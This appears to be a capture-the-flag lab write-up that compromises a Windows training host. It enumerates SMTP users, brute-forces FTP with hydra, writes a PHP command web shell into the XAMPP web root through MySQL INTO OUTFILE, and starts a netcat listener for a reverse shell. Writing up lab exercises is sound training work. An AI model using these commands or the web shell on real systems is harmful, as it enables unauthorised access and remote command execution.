Attacking Common Services - Easy

Hints:

1- Enumerate users using the 'users.list' provided in the resources under CheatSheet.

2- Utilize the identified user for brute-forcing a service.

3- Employ the previously obtained credentials to upload a shell.

So the first step i initiated an Nmap scan.

21/tcp open ftp

| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US

| Not valid before: 2022-04-21T19:27:17

|_Not valid after: 2032-04-18T19:27:17

| fingerprint-strings:

| GenericLines:

| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered

| Command unknown, not supported or not allowed...

| Help:

| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered

| 214-The following commands are implemented

| USER PASS ACCT QUIT PORT RETR

| STOR DELE RNFR PWD CWD CDUP

| NOOP TYPE MODE STRU

| LIST NLST HELP FEAT UTF8 PASV

| MDTM REST PBSZ PROT OPTS CCC

| XCRC SIZE MFMT CLNT ABORT

| HELP command successful

| NULL, SMBProgNeg, SSLSessionReq:

|_ 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered

25/tcp open smtp hMailServer smtpd

| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP

|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

443/tcp open ssl/https?

|_ssl-date: 2024-04-02T17:43:49+00:00; +8s from scanner time.

| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US

| Not valid before: 2022-04-21T19:27:17

|_Not valid after: 2032-04-18T19:27:17

587/tcp open smtp hMailServer smtpd

| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP

|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

3389/tcp open ms-wbt-server Microsoft Terminal Services

|_ssl-date: 2024-04-02T17:43:49+00:00; +10s from scanner time.

| ssl-cert: Subject: commonName=WIN-EASY

| Not valid before: 2024-04-01T17:26:40

|_Not valid after: 2024-10-01T17:26:40

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at [https://nmap.org/cgi-bin/submit.cgi?new-service](https://nmap.org/cgi-bin/submit.cgi?new-service) :

Service Info: Host: WIN-EASY; OS: Windows; CPE: cpe:/o:microsoft:windows

So the first thing I noticed was that we could use RCPT and VRFY, but VRFY would not work. Therefore i opted for the second option and then i ran smtp-user-enum to enumerate users over SMTP.

./smtp-user-enum -m RCPT -u users.list inlanefreight.htb 25 -d inlanefreight.htb
Connecting to inlanefreight.htb 25 ...
220 WIN-EASY ESMTP
250 Hello.
250 OK
Start enumerating users with RCPT mode ...
[SUCC] fiona 250 OK

As we obtained the 'fiana' user, we proceeded to brute-force FTP using this username.

 hydra -l fiona -P /usr/share/wordlists/rockyou.txt  -t 32 10.129.14.76 ftp -vV

And we can also utilize the user's credentials to connect to MySQL.

mysql -h 10.129.14.76 -u fiona -p

If you check you will find that the user can use outfile(). so let's proceed to create a simple webshell and save it in the root directory of the XAMPP server.

MariaDB [(none)]> SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php";

So, if we need to verify whether that file has been created or not

MariaDB [(none)]> SELECT LOAD_FILE("C:\\xampp\\htdocs\\backdoor.php");
+----------------------------------------------+
| LOAD_FILE("C:\\xampp\\htdocs\\backdoor.php") |
+----------------------------------------------+
| <?php system($_GET['cmd']); ?>
              |
+----------------------------------------------+
1 row in set (0.051 sec)

Now, we can read the flag by visiting the path of our web shell but if we focus to obtain a shell on that server, let's generate a PowerShell shell.

and we need to start a listener

rlwrap nc -lnvp 4444

To trigger our shell and obtain the shell, we can navigate to the path where it is located which is in the root directory

getting shell

get the flag

PS C:\xampp> Get-ChildItem -Path c:\ -Filter "flag.txt" -Recurse


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/22/2022  10:36 AM             39 flag.txt

PreviousAttacking Common Services NextAttacking Common Services - Medium

Last updated 1 year ago

Was this helpful?

21/tcp open ftp | ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US | Not valid before: 2022-04-21T19:27:17 |_Not valid after: 2032-04-18T19:27:17 | fingerprint-strings: | GenericLines: | 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered | Command unknown, not supported or not allowed... | Help: | 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered | 214-The following commands are implemented | USER PASS ACCT QUIT PORT RETR | STOR DELE RNFR PWD CWD CDUP | NOOP TYPE MODE STRU | LIST NLST HELP FEAT UTF8 PASV | MDTM REST PBSZ PROT OPTS CCC | XCRC SIZE MFMT CLNT ABORT | HELP command successful | NULL, SMBProgNeg, SSLSessionReq: |_ 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered 25/tcp open smtp hMailServer smtpd | smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 443/tcp open ssl/https? |_ssl-date: 2024-04-02T17:43:49+00:00; +8s from scanner time. | ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US | Not valid before: 2022-04-21T19:27:17 |_Not valid after: 2032-04-18T19:27:17 587/tcp open smtp hMailServer smtpd | smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-04-02T17:43:49+00:00; +10s from scanner time. | ssl-cert: Subject: commonName=WIN-EASY | Not valid before: 2024-04-01T17:26:40 |_Not valid after: 2024-10-01T17:26:40 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at [https://nmap.org/cgi-bin/submit.cgi?new-service](https://nmap.org/cgi-bin/submit.cgi?new-service) : Service Info: Host: WIN-EASY; OS: Windows; CPE: cpe:/o:microsoft:windows

./smtp-user-enum -m RCPT -u users.list inlanefreight.htb 25 -d inlanefreight.htb Connecting to inlanefreight.htb 25 ... 220 WIN-EASY ESMTP 250 Hello. 250 OK Start enumerating users with RCPT mode ... [SUCC] fiona 250 OK

MariaDB [(none)]> SELECT LOAD_FILE("C:\\xampp\\htdocs\\backdoor.php"); +----------------------------------------------+ | LOAD_FILE("C:\\xampp\\htdocs\\backdoor.php") | +----------------------------------------------+ | <?php system($_GET['cmd']); ?> | +----------------------------------------------+ 1 row in set (0.051 sec)

PS C:\xampp> Get-ChildItem -Path c:\ -Filter "flag.txt" -Recurse Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/22/2022 10:36 AM 39 flag.txt